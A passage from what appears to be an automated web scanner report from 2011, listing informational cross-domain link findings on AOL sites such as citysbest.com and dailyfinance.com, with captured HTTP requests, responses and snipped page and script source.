Cookie: s_vi=[CS]v1|26D7B9FD85162B9C-600001848003F046[CE]; POD=us~en; ac_survey=1; ccl=B5ebQMrboP/GSTm8I+6Sg1qQULUt3cGrRwZyioHji6hbHFZ2wRYZ4hnLCzAmoaD1jiO8RqoLIhT9+xUZPzXnAdntHreObH6THD4IhsBMGdYx8KVcAZcNFgCOUqj115aVGadV85bVoFGsDegaFsOjy3wsZurD89dX1RTm+OGdPQXwdO6Mo/53N2M6/xN6zsXAOPmNWeI6RT77VPGQDAFPK503AxWpiaMY6zKRg1tdJlwQUHU/9lKIqyiSPDuTDj9yV/0D6lo7B/Nkm0eoIaudf67q9FV6261SddPmqBY3uh7GpUWWHIxJMVXb/N/JrMrq5F67PgazCkgcOfBX2Wzz8UIgVnrBKihd3Khc1VbEtAew2e7TfKMB1xRi6o3YCAJzcOGlc1uyCewBfqH7Ar4AoWyAsJMyzq65jVZnLJQbxDVZ8doj45HN6BYAPR8CJXFPgvognk4DEuRv1EW93WL0lwBFCxK+lfzV/buf6UTDZwWFR9AQf2cq8+/mnlfFH7Aeo18W8lX0qpPAat0BiPGGIzIJ/HfslVi2qu1udIfVUMs0lTTNNQoTQ7ICrm3kL1cW; geo=US; dfa_cookie=appleglobal%2Cappleitunes%2Cappleusitunesipod; s_pv=itunes%20-%20affiliates%20-%20download%20itunes%20(US); s_ppv=itunes%2520-%2520affiliates%2520-%2520download%2520itunes%2520%2528US%2529; s_orientation=%5B%5BB%5D%5D; s_cc=true; s_ria=Flash%2010%7C; s_pathLength=itunes%3D1%2C; s_vnum_us=ch%3Ditunes%26vn%3D2%3Bch%3Dsupport%26vn%3D1%3B; s_invisit_us=itunes%3Dtrue%3B; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Apache/2.2.14 (Unix)
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Thu, 05 May 2011 12:55:26 GMT
Date: Thu, 05 May 2011 12:45:26 GMT
Connection: close
Content-Length: 14466

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta name="Author" content="Ap
...[SNIP]...
<noscript>
       <iframe src="http://fls.doubleclick.net/activityi;src=1566767;type=itune088;cat=apple465;ord=1;num=1?" width=1 height=1 frameborder=0></iframe>
...[SNIP]...

16.26. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blogsmithmedia.com
Path:	/www.citysbest.com/include/citysbest-min.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js?30

The response contains the following link to another domain:

http://mapq.st/map?q='+listingStreet+' '+listingCity+' '+listingState+' '+listingZip+' ('+listingName+')&maptype=map

Request

GET /www.citysbest.com/include/citysbest-min.js?30 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Accept-Ranges: bytes
ntCoent-Length: 133951
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=856
Expires: Thu, 05 May 2011 01:12:59 GMT
Date: Thu, 05 May 2011 00:58:43 GMT
Connection: close
Content-Length: 133951

(function($){var defaultOptions={signupServiceUrl:'http://newsletter.sandbox.asylum.com/newsletter_signup.php',standalone:false,verify:true,site:'asylum',list:'main',template:'welcome',formClass:'aol-
...[SNIP]...
<div style="width:100px;padding-bottom:10px;">';htmlBody=htmlBody+'<a href="http://mapq.st/map?q='+listingStreet+' '+listingCity+' '+listingState+' '+listingZip+' ('+listingName+')&maptype=map" target="_blank" class="map-link">Get Directions »</a>
...[SNIP]...

16.27. http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blogsmithmedia.com
Path:	/www.dailyfinance.com/include/dailyfinance.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js?v=198

The response contains the following links to other domains:

http://money.aol.com/
http://o.aolcdn.com/os/money/dailyfinance/css/aol.globalheader-1.1_df.png
http://quote-web.aol.com/?s='+ arrMNstocks[currentIndex].replace(/.*[:]/ig,
http://quote-web.aol.com/?s='+ mktsym +'&e='+ mktXch +'&dur=999&type=mountain&hgl=1&vgl=1&vol=0&splits=0&div=0&w=432&h=242&scheme=platinum&gran=d&timeStamp=' + nowtime.getTime() + '
http://www.dailyfinance.com/

Request

GET /www.dailyfinance.com/include/dailyfinance.js?v=198 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Accept-Ranges: bytes
ntCoent-Length: 245796
Content-Type: application/javascript
Cache-Control: max-age=394
Expires: Thu, 05 May 2011 01:05:08 GMT
Date: Thu, 05 May 2011 00:58:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 245796

/* Rev:$Revision: 146709 $ */

// check for cookie containg user's live updates status.
var lvStatusInit = getCookie('AOL_StockQuotesLiveUpdate');
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi
...[SNIP]...
<a href="'+ chartsbaseurl +'/classic-charts?dr=999" onclick ="s_objectID=s_265.pageName + \' Market News Chart: Main Chart Clicked\';"><img src="http://quote-web.aol.com/?s='+ arrMNstocks[currentIndex].replace(/.*[:]/ig,"") +'&e='+ lvStocks[arrMNstocks[currentIndex]].x +'&dur=999&type=mountain&hgl=1&vgl=1&vol=0&splits=0&div=0&w=432&h=242&scheme=platinum&gran=d&timeStamp=' + nowtime.getTime() + '" width="432" height="242" alt="Market News" border="0" /></a>
...[SNIP]...
<a href="'+ chartsbaseurl +'/classic-charts?dr=999" onclick ="s_objectID=s_265.pageName + \' Market News Chart: Main Chart Clicked\';"><img src="http://quote-web.aol.com/?s='+ mktsym +'&e='+ mktXch +'&dur=999&type=mountain&hgl=1&vgl=1&vol=0&splits=0&div=0&w=432&h=242&scheme=platinum&gran=d&timeStamp=' + nowtime.getTime() + '" width="432" height="242" alt="Market News" border="0" /></a>
...[SNIP]...
<h4><a href="http://money.aol.com">';
moduleString += '">
...[SNIP]...
<h4><a href="http://money.aol.com">';
moduleString += '">
...[SNIP]...
<h2 title="DailyFinance"><a title="DailyFinance Main" href="http://www.dailyfinance.com/" class="_o0-0"><img src="http://o.aolcdn.com/os/money/dailyfinance/css/aol.globalheader-1.1_df.png" alt="Dailyfinance"/></a>
...[SNIP]...

16.28. http://www.citysbest.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.citysbest.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.citysbest.com/?icid=navbar_citysbest_main5

The response contains the following links to other domains:

http://about.aol.com/aolnetwork/trademarks
http://adinfo.aol.com/about-our-ads/
http://corp.aol.com/
http://feedback.aol.com/rs/rs.php?sid=citysbest
http://help.aol.com/help/product/citys_best/
http://legal.aol.com/TOS
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.multiauth-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&os=4
http://privacy.aol.com/
http://www.aol.com/
http://www.blogcdn.com/www.citysbest.com/media/2011/04/13.mcqueensp2010platosatlantis-1303942476_157x157.jpg
http://www.blogcdn.com/www.citysbest.com/media/2011/04/blake-lively-in-a-bikini-in-vogue-issue-june-2010_157x157.jpg
http://www.blogcdn.com/www.citysbest.com/media/2011/04/deepeddy_157x157.jpg
http://www.blogcdn.com/www.citysbest.com/media/2011/04/tune_157x157.jpg
http://www.blogcdn.com/www.citysbest.com/media/2011/05/5244507744173bcc6cc3_157x157.jpg
http://www.blogcdn.com/www.citysbest.com/media/2011/05/banamine-flickr_157x157.jpg
http://www.blogcdn.com/www.citysbest.com/media/2011/05/brasseriebeckpatio-1304303119_157x157.jpg
http://www.blogcdn.com/www.citysbest.com/media/2011/05/ironman_157x157.jpg
http://www.blogcdn.com/www.citysbest.com/media/2011/05/liljonapprentice_157x157.jpg
http://www.blogcdn.com/www.citysbest.com/media/2011/05/woodys_157x157.jpg
http://www.blogsmithmedia.com/www.citysbest.com/include/background.js?9
http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js?30
http://www.blogsmithmedia.com/www.citysbest.com/media/citysbest-min.css?63

Request

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:36 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:36 GMT; path=/
Content-Type: text/html
Content-Length: 15501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...

       <script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.multiauth-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&os=4" type="text/javascript"></script>
<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.citysbest.com/include/background.js?9"></script>
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js?30"></script>        
       <link rel="stylesheet" href="http://www.blogsmithmedia.com/www.citysbest.com/media/citysbest-min.css?63" media="all" />
       
...[SNIP]...

       <script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<div class="aol-logo clearfix"><a href="http://www.aol.com">AOL</a>
...[SNIP]...
<a href="/cleveland/news/2011/05/04/know-your-heroes-who-to-watch-for-during-avengers-filming/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/05/ironman_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/atlanta/news/2011/05/04/ashley-asks-atl-rapper-and-celebrity-apprentice-lil-jon/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/05/liljonapprentice_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/miami/news/2011/05/04/food-fight-philly-cheesesteak-face-off/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/05/woodys_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/austin/news/2011/05/04/weird-austin-deep-eddy/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/04/deepeddy_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/denver/news/2011/05/04/denver-concerts-5-hot-picks-for-this-weekend/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/04/tune_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/san-diego/news/2011/05/03/sexy-san-diego-what-is-s-d-style/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/04/blake-lively-in-a-bikini-in-vogue-issue-june-2010_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/chicago/news/2011/05/03/celebrate-the-2011-kentucky-derby-in-chicago/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/05/banamine-flickr_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/washington-dc/news/2011/05/03/the-best-spots-for-dining-outdoors-in-dc/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/05/brasseriebeckpatio-1304303119_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/los-angeles/news/2011/05/03/tequila-5-l-a-cocktails-none-margaritas/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/05/5244507744173bcc6cc3_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<a href="/new-york-city/news/2011/04/28/mom-and-the-city-5-mothers-day-activities-in-nyc/"><img src="http://www.blogcdn.com/www.citysbest.com/media/2011/04/13.mcqueensp2010platosatlantis-1303942476_157x157.jpg" width="157" height="157"></a>
...[SNIP]...
<li class="first"><a href="http://corp.aol.com/">AOL Inc.</a>
...[SNIP]...
<li><a href="http://legal.aol.com/TOS">Updated Terms of Service</a>
...[SNIP]...
<li><a href="http://privacy.aol.com/">Updated Privacy Policy</a>
...[SNIP]...
<li class="last"><a href="http://adinfo.aol.com/about-our-ads/">About Our Ads</a>
...[SNIP]...
<li class="first"><a href="http://about.aol.com/aolnetwork/trademarks">Trademarks</a>
...[SNIP]...
<li><a href="http://help.aol.com/help/product/citys_best/">Help + Support</a>
...[SNIP]...
<li><a onclick = "return fBo('citysbest');" href="http://feedback.aol.com/rs/rs.php?sid=citysbest">Feedback</a>
...[SNIP]...

16.29. http://www.dailyfinance.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailyfinance.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.dailyfinance.com/?icid=navbar_finance_main5

The response contains the following links to other domains:

http://247wallst.com/
http://about.aol.com/aolnetwork/aol_pp
http://about.aol.com/aolnetwork/trademarks
http://advertising.aol.com/brands/dailyfinance
http://aol.smartmoney.com/
http://aol.sportingnews.com/
http://daol.aol.com/software/livemocha?en=cff58f1f-cade-4403-bbab-69d58ca73fc0&sp=20017294-689d-478a-bbf4-e5fbb2d3820c&fr=beef7de7-49fa-469f-9134-de66e488858d&de=e72425de-d20a-400b-8124-5f96bcecc75d&it=54e5a3eb-4001-4c2f-9a7a-41b8dfa03796
http://feedproxy.google.com/~r/247wallst_partners/~3/-zb8Lq7x3zc/
http://feedproxy.google.com/~r/247wallst_partners/~3/Gpc53FcN3fg/
http://feedproxy.google.com/~r/247wallst_partners/~3/I61aGXv_tTw/
http://feedproxy.google.com/~r/247wallst_partners/~3/VchhDCUnw90/
http://feedproxy.google.com/~r/247wallst_partners/~3/VyFCCMzEWhQ/
http://feedproxy.google.com/~r/247wallst_partners/~3/dFlfepnKOeE/
http://feedproxy.google.com/~r/247wallst_partners/~3/xSPsy0oSRKQ/
http://feedproxy.google.com/~r/247wallst_partners/~3/xWo9SUG82MU/
http://js.adsonar.com/js/tw_dfp_adsonar.js
http://money.cnn.com/index.html
http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm?eref=aol
http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm?eref=aol
http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm?eref=aol
http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm?eref=aol
http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm?eref=aol
http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm?eref=aol
http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm?eref=aol
http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm?eref=aol
http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm?eref=aol
http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm?eref=aol
http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm?eref=aol
http://music.aol.com/radioguide/bb
http://noticias.aol.com/category/latino-news/
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/art/ch_dailyfinance/huff_po_logo
http://o.aolcdn.com/art/ch_dailyfinance/togo_logo
http://o.aolcdn.com/art/ch_pf/follow_facebook
http://o.aolcdn.com/art/ch_pf/follow_rss
http://o.aolcdn.com/art/ch_pf/follow_twitter
http://o.aolcdn.com/art/channels/0e/05/486d02a8-0024a-02bbb-400cb8e1
http://o.aolcdn.com/art/channels/0f/04/46a620a1-0021f-01a0a-400cb8e1
http://o.aolcdn.com/art/channels/0f/06/483210ef-000fc-069da-400cb8e1
http://o.aolcdn.com/dynamoney/dayfin/i/1-df-loading-spinner.gif
http://o.aolcdn.com/js/swfobject-1.5.1/swfobject.js
http://o.aolcdn.com/os/df/css/feeds_subscribe_en_us.css
http://o.aolcdn.com/os/df/js/copyRight.js
http://o.aolcdn.com/os/df/js/feeds_subscribe_en_us.js
http://o.aolcdn.com/os/news/art/livemocha_ad
http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.5.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.min.js&os=4
http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js
http://o.aolcdn.com/os_merge/?file=/df/js/jquery.globalheader-1.3.js&file=/df/js/jquery.globalsearchbox-1.3.js&file=/df/js/df-search0.6.js&file=/df/js/jslib1.5.js&file=/df/smartbox1.7.4.js
http://realestate.aol.com/
http://realestate.aol.com/blog/2011/05/04/gossip-girls-kelly-rutherford-lists-west-hollywood-home-at-1-3/
http://realestate.aol.com/blog/2011/05/04/madonnas-childhood-home-lists-for-49k/
http://realestate.aol.com/blog/2011/05/04/natural-disasters-and-terror-plots-what-home-insurance-covers/
http://smallbusiness.aol.com/
http://smallbusiness.aol.com/2011/05/04/baby-boomers-say-their-age-is-an-asset-in-workplace/
http://smallbusiness.aol.com/2011/05/04/choose-the-right-franchise/
http://smallbusiness.aol.com/2011/05/04/small-business-sells-out-of-kate-middletons-wedding-perfume/
http://smallbusiness.aol.com/category/advertising-and-marketing/
http://smallbusiness.aol.com/category/money/
http://smallbusiness.aol.com/category/starting-a-business/
http://twitter.com/daily_finance
http://video.foxbusiness.com/v/4677646/job-market-weighing-on-economic-recovery/?playlist_id=87069
http://video.foxbusiness.com/v/4677647/white-house-announces-it-wont-release-bin-laden-pictures/?playlist_id=87069
http://video.foxbusiness.com/v/4677755/the-need-to-boost-oil-drilling-in-us/?playlist_id=87070
http://webmail.aol.com/?_AOLLOCAL=mail
http://www.adobe.com/go/getflashplayer/
http://www.aol.com/
http://www.aolnews.com/
http://www.aolnews.com/2011/05/04/first-bin-laden-now-lex-luthor-evil-doers-return-historic-supe/
http://www.aolnews.com/2011/05/04/man-plows-into-alaskan-brewing-company-steals-beer/
http://www.aolnews.com/2011/05/04/uma-thurman-makes-bizarre-tv-ad-for-schweppes/
http://www.aolnews.com/story/white-house-advances-us-colombia-trade/1626038
http://www.autoblog.com/
http://www.blogcdn.com/www.dailyfinance.com/media/2010/05/1-wii_186x136.jpg
http://www.blogcdn.com/www.dailyfinance.com/media/2010/05/tornado_186x136.jpg
http://www.blogcdn.com/www.dailyfinance.com/media/2011/03/atttmobile240_186x136.jpg
http://www.blogcdn.com/www.dailyfinance.com/media/2011/04/dish_186x136.jpg
http://www.blogcdn.com/www.dailyfinance.com/media/2011/05/bikers240_186x136.jpg
http://www.blogcdn.com/www.dailyfinance.com/media/2011/05/dodgers.jpg
http://www.blogcdn.com/www.dailyfinance.com/media/2011/05/elderly_186x136.jpg
http://www.blogcdn.com/www.dailyfinance.com/media/2011/05/jobsreport240.jpg
http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js?v=198
http://www.blogsmithmedia.com/www.dailyfinance.com/media/dailyfinance.css
http://www.cnbc.com/
http://www.cnnmoney.com/
http://www.downloadsquad.com/
http://www.engadget.com/
http://www.engadget.com/2011/05/04/barnes-and-noble-to-release-new-e-reader-according-to-securities/
http://www.engadget.com/2011/05/04/crtc-sets-target-of-5mbps-broadband-for-all-canadians-by-2015/
http://www.engadget.com/2011/05/04/polyro-humanoid-robot-can-be-built-by-you-looks-more-like-k-9-t/
http://www.facebook.com/DailyFinance
http://www.foxbusiness.com/index.html
http://www.ft.com/cms/s/0/18b96d66-76a2-11e0-bd5d-00144feabdc0.html?ftcamp=rss
http://www.ft.com/cms/s/0/2dfcc23c-7697-11e0-bd5d-00144feabdc0.html?ftcamp=rss
http://www.ft.com/cms/s/0/943fd622-76a3-11e0-bd5d-00144feabdc0.html?ftcamp=rss
http://www.ft.com/home/us
http://www.housingwatch.com/
http://www.huffingtonpost.com/
http://www.huffingtonpost.com/2011/05/04/freddie-mac-attributes-fi_n_857789.html
http://www.huffingtonpost.com/2011/05/04/gop-blocks-elizabeth-warren-cfpb_n_857780.html
http://www.huffingtonpost.com/2011/05/04/youth-optimism-historic-low-poll_n_857750.html
http://www.huffingtonpost.com/politics/
http://www.luxist.com/
http://www.luxist.com/2011/05/04/fortis-spaceleader-volkswagen-design-white-watch/
http://www.luxist.com/tag/CelebrityRealEstate/
http://www.luxist.com/tag/condo+auction/
http://www.luxist.com/tag/hoteldeals/
http://www.parentdish.com/
http://www.rentedspaces.com/
http://www.smartmoney.com/investing/stocks/4-surprise-reactions-to-sp-treasury-slam-1303161672034/?cid=sm_dailyfinanceRSS
http://www.smartmoney.com/investing/stocks/5-reasons-brics-are-back-1303831340166/?cid=sm_dailyfinanceRSS
http://www.smartmoney.com/personal-finance/retirement/test-drive-your-retirement-home-1304011789458/?cid=sm_dailyfinanceRSS
http://www.smckids.com/
http://www.tuaw.com/
http://www.walletpop.com/
http://www.walletpop.com/2011/05/04/amazons-myhabit-com-joins-the-private-sale-website-club/
http://www.walletpop.com/2011/05/04/grape-tomatoes-in-ready-made-salads-recalled-over-salmonella-fea/
http://www.walletpop.com/2011/05/04/one-lot-of-coumadin-recalled-over-potency-fears/
http://www.walletpop.com/2011/05/04/reduce-gas-the-easy-way-try-bike-to-work-and-school-month/
http://www.walletpop.com/category/debt/
http://www.walletpop.com/category/fraud/
http://www.walletpop.com/category/insurance/
http://www.walletpop.com/category/loans/
http://www.walletpop.com/category/recalls/
http://www.walletpop.com/category/retire/
http://www.walletpop.com/college-finance/
http://www.walletpop.com/taxes/
http://www.walletpop.com/taxes/advice/
http://www.walletpop.com/taxes/basics/
http://www.walletpop.com/taxes/credit/
http://www.walletpop.com/taxes/forms/
http://www.walletpop.com/taxes/online/

Request

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:33 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:33 GMT; path=/
Content-Type: text/html
Content-Length: 126939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<head>
<script src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
 <script src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://www.blogsmithmedia.com/www.dailyfinance.com/media/dailyfinance.css" media="screen, projection" />
<script type="text/javascript" src="http://o.aolcdn.com/js/swfobject-1.5.1/swfobject.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.5.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.min.js&os=4" ></script>

<script type="text/javascript" src="http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js?v=198"></script>
...[SNIP]...
<li class="GH_hat_LI"><a href="http://www.aol.com" target="_blank"><span id="GH_hat_AOL_logo">
...[SNIP]...
<li class="GH_hat_LI"><a href="http://webmail.aol.com/?_AOLLOCAL=mail" class="GH_hat_A GH_hat_links_A" target="_blank">MAIL</a>
...[SNIP]...
<li><a href="http://www.walletpop.com/">WalletPop</a>
...[SNIP]...
<li><a href="http://www.luxist.com/">Luxist</a>
...[SNIP]...
<li><a href="http://smallbusiness.aol.com/">Small Business</a>
...[SNIP]...
<strong>You may need to upgrade your Flash player by visiting this link <a href="http://www.adobe.com/go/getflashplayer/">http://www.adobe.com/go/getflashplayer/</a>
...[SNIP]...
<div class="imagedetail"><img src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/05/jobsreport240.jpg"></img>
...[SNIP]...
<a href="http://www.dailyfinance.com/2011/05/04/survey-most-americans-underestimate-retirement-healthcare-costs/"><img hspace="4" border="1" vspace="4" src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/05/elderly_186x136.jpg" alt="" /></a>
...[SNIP]...
<h3>

<a href="http://www.walletpop.com/2011/05/04/reduce-gas-the-easy-way-try-bike-to-work-and-school-month/" target="_self" rel="bookmark">

Reduce Gas the Easy Way: Bike to Work, School</a>
...[SNIP]...
<a href="http://www.dailyfinance.com/2011/05/04/reduce-gas-the-easy-way-try-bike-to-work-and-school-month/"><img hspace="4" border="1" vspace="4" src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/05/bikers240_186x136.jpg" alt="" /></a>
...[SNIP]...
<a href="http://www.dailyfinance.com/2011/05/04/tornado-flood-hurricane-quake-are-you-covered-for-a-worst-ca/"><img hspace="4" border="1" vspace="4" src="http://www.blogcdn.com/www.dailyfinance.com/media/2010/05/tornado_186x136.jpg" alt="" /></a>
...[SNIP]...
<a href="http://www.dailyfinance.com/2011/05/04/dodgers-hit-a-home-run-with-free-tickets-for-service-members-ve/"><img hspace="4" border="1" class="photoRight" vspace="4" src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/05/dodgers.jpg" alt="" /></a>
...[SNIP]...
<a href="http://www.dailyfinance.com/2011/05/04/dish-network-sued-over-free-starz-promotion/"><img hspace="4" border="1" vspace="4" src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/04/dish_186x136.jpg" alt="" /></a>
...[SNIP]...
<a href="http://www.dailyfinance.com/2011/05/04/nintendo-cuts-wii-prices-ahead-of-new-gaming-system-launch/"><img hspace="4" border="1" vspace="4" src="http://www.blogcdn.com/www.dailyfinance.com/media/2010/05/1-wii_186x136.jpg" alt="" /></a>
...[SNIP]...
<a href="http://www.dailyfinance.com/2011/05/04/att-tmobile-buyout-fcc-doj-antitrust-investigation/"><img hspace="4" border="1" vspace="4" src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/03/atttmobile240_186x136.jpg" alt="" /></a>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/tw_dfp_adsonar.js"></script>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'The White House said Wednesday that it was ready to start talks with Congress on a free trade deal with Colombia, setting the stage for lawmakers to move ahead on similar agreements with South Korea and Panama, as Republicans had demanded.')" onmouseout="javascript:hidePop()" href="http://www.aolnews.com/story/white-house-advances-us-colombia-trade/1626038">White House advances US-Colombia trade...</a>
...[SNIP]...
<div class="genTabHidden"><img src="http://o.aolcdn.com/dynamoney/dayfin/i/1-df-loading-spinner.gif"></div>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'If you're a bank customer, you could soon be facing higher ATM fees, a $50 spending limit on your debit card, or a 30% late payment penalty on your credit card. And those debit rewards you've been enjoying? Say goodbye to those.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm?eref=aol">The wrath of the banks</a>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'Aljolynn Sperber, a single mom in Los Angeles, says she can no longer afford to visit her family in Sacramento because of the cost of fuel.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm?eref=aol">Paying for gas forces painful sacrifices</a>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'When their mother died of cancer in June 2007, Pattie Cagney Sheehan and her four siblings inherited the Hinsdale, Ill., three-bedroom ranch where their parents had lived. Estimated value: just over $1 million.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm?eref=aol">Inheritance: How to handle a million-dollar...</a>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'Grisha Stpanov opened a credit card, charged up $20,000, but never paid it back.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm?eref=aol">Anatomy of a $500,000 credit card fraud</a>
...[SNIP]...
<li>
